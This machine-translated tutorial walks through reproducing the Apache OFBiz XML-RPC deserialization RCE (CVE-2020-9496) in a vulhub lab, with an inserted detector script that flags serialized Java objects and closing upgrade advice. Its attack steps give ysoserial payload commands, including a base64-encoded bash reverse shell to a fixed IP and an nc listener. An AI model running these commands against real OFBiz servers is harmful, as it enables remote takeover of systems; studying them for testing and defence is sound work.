
How to realize the recurrence of Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496

2025-01-23 Update From: SLTechnology News&Howtos (Network Security)


Shulou(Shulou.com)05/31 Report--

In this issue, the editor walks through how to reproduce the Apache OFBiz XML-RPC RCE vulnerability CVE-2020-9496. The article describes each step in detail, and I hope you take something away from reading it.

0x00 Introduction

Apache OFBiz's full name is The Apache Open For Business Project. It is an open e-commerce platform and a very well-known open source project. It provides a framework for building large and medium-sized, enterprise-level, cross-database, cross-application-server, multi-tier, distributed e-commerce web application systems based on the J2EE/XML specifications and technical standards. OFBiz implements almost all of the J2EE core design patterns, the coupling between modules is relatively loose, and users can easily take modules apart according to their own needs, which makes it very flexible.

0x01 Vulnerability overview

Apache OFBiz contains a deserialization vulnerability: the XML-RPC interface can be reached without authorization, so an attacker can send a specially constructed XML-RPC HTTP request to it and achieve remote code execution.

0x02 Affected versions

- Apache OFBiz < 17.12.04

0x03 Environment setup

1. This environment is built with vulhub. On a virtual machine with docker installed, clone the repository:

git clone https://github.com/vulhub/vulhub.git

2. Enter the vulnerability directory and use docker-compose to pull the vulnerable environment; a green "done" indicates success.

cd vulhub/ofbiz/CVE-2020-9496/

docker-compose up -d

3. Visit https://your-ip:8443/myportal/control/main in the browser to reach the registration page.

4. Install the environment needed to reproduce the vulnerability

4.1 Install the Java 8 environment

Choose the JDK download matching your system from https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html

Create a folder and extract the downloaded JDK into it.

mkdir /opt/java

tar zxvf jdk-8u251-linux-x64.tar.gz -C /opt/java

4.3 Add the Java environment variables

vim /etc/profile

Add at the end (the JAVA_HOME directory name must match the JDK version you actually extracted):

export JAVA_HOME=/opt/java/jdk1.8.0_141

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

4.4 Reload the profile so the variables take effect immediately, then check the Java version.

source /etc/profile

java -version

5. Install Maven: download it with wget

wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

mkdir /opt/maven

tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/

5.1 Configure the environment variables

vim /etc/profile

5.2 Add at the bottom:

export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

export PATH=$MAVEN_HOME/bin:$PATH

5.3 Reload the profile so the variables take effect immediately, then check the Maven version.

source /etc/profile

mvn -version

0x04 Vulnerability reproduction

1. Download the Java deserialization tool ysoserial from GitHub

git clone https://github.com/frohoff/ysoserial.git

2. Enter the ysoserial directory and use Maven to download the dependencies and build the package; a successful build is shown in the screenshot (image not preserved).

mvn clean package -DskipTests

3. A target directory now appears under the ysoserial directory; enter it.

4. Open the following URL in the browser, capture the request with Burp, and send it to the Repeater module

https://your-ip:8443/webtools/control/xmlrpc

5. Replace the request with the following packet (only the headers and a few fragments of the XML body survived extraction):

POST /webtools/control/xmlrpc HTTP/1.1

Host: your-ip

Content-Type: application/xml

Content-Length: 4093

ProjectDiscovery

Test

[base64-payload]

6. Use ysoserial's CommonsBeanutils1 gadget chain to generate a payload that writes a file in the tmp directory

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

7. Copy the base64-encoded payload, paste it in place of base64payload in the Burp request, click Send, and check inside the docker container whether the file was written.

8. Exploit the vulnerability to get a reverse shell. Go to the following URL to base64-encode the reverse-shell payload.

http://www.jackson-t.ca/runtime-exec-payloads.html

9. Encode the encoded shell command once more with the ysoserial tool.

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx} | {base64,-d} | {bash,-i}" | base64 | tr -d "\n"

10. Start an nc listener, put the generated payload into the Burp request, send it, and check the nc listener for the returned shell.
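The request in step 5 carries a Java serialized object as base64 text inside the XML-RPC body. As a defender-side complement, the following added example (not part of the original article and not OFBiz code) shows how a WAF rule, proxy plugin or log-review script can flag such requests: it walks every text node of the XML body, base64-decodes anything that looks like base64, and checks for the Java serialization stream magic ac ed 00 05 (which shows up as the prefix rO0AB in base64). The endpoint path is the one named on this page; the XML shape of the sample requests, the function names and the sample payload bytes are constructed for the example.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Every Java serialization stream starts with STREAM_MAGIC (0xACED) followed by
# STREAM_VERSION (0x0005); in base64 this prefix appears as "rO0AB".
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# The vulnerable endpoint named on this page.
XMLRPC_PATH = "/webtools/control/xmlrpc"


def decode_base64_blob(text):
    """Return the decoded bytes if `text` looks like a base64 blob, else None."""
    s = re.sub(r"\s+", "", text or "")
    if len(s) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_serialized_java(xml_body):
    """Return the tags of all XML text nodes whose base64 content decodes to a Java stream."""
    hits = []
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return hits
    for elem in root.iter():
        for text in (elem.text, elem.tail):
            raw = decode_base64_blob(text)
            if raw is not None and raw.startswith(JAVA_STREAM_MAGIC):
                hits.append(elem.tag)
    return hits


def inspect_request(method, path, body):
    """Classify one HTTP request as ('ignore' | 'clean' | 'alert', [tags])."""
    if method.upper() != "POST" or not path.startswith(XMLRPC_PATH):
        return ("ignore", [])
    tags = find_serialized_java(body)
    if tags:
        return ("alert", tags)
    return ("clean", [])


# Constructed sample bodies (the exact XML-RPC layout is an assumption; the detector
# does not depend on tag names). The "serialized object" is just the magic bytes plus
# filler, not a real gadget chain.
SAMPLE_JAVA_BLOB = base64.b64encode(JAVA_STREAM_MAGIC + b"constructed-sample").decode()
MALICIOUS_BODY = (
    "<methodCall><methodName>ProjectDiscovery</methodName><params><param><value>"
    "<struct><member><name>Test</name><value><serializable>" + SAMPLE_JAVA_BLOB +
    "</serializable></value></member></struct></value></param></params></methodCall>"
)
BENIGN_BODY = (
    "<methodCall><methodName>ping</methodName><params><param><value>"
    "<string>aGVsbG8gd29ybGQ=</string></value></param></params></methodCall>"
)

if __name__ == "__main__":
    for label, req in (("malicious", ("POST", XMLRPC_PATH, MALICIOUS_BODY)),
                       ("benign", ("POST", XMLRPC_PATH, BENIGN_BODY)),
                       ("other path", ("POST", "/myportal/control/main", MALICIOUS_BODY))):
        print(label, "->", inspect_request(*req))
```

The benign sample deliberately contains valid base64 ("hello world") to show that the check keys on the decoded magic bytes rather than on the presence of base64; a rule that only matched base64 text on this endpoint would fire on legitimate XML-RPC traffic.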

0x05 Remediation recommendation

1. Upgrading to the latest version is recommended (per the affected range above, 17.12.04 or later contains the fix).

The above is the editor's walkthrough of how to reproduce the Apache OFBiz XML-RPC RCE vulnerability CVE-2020-9496. If you have similar questions, you may refer to the analysis above; if you want to learn more, you are welcome to follow the industry information channel.
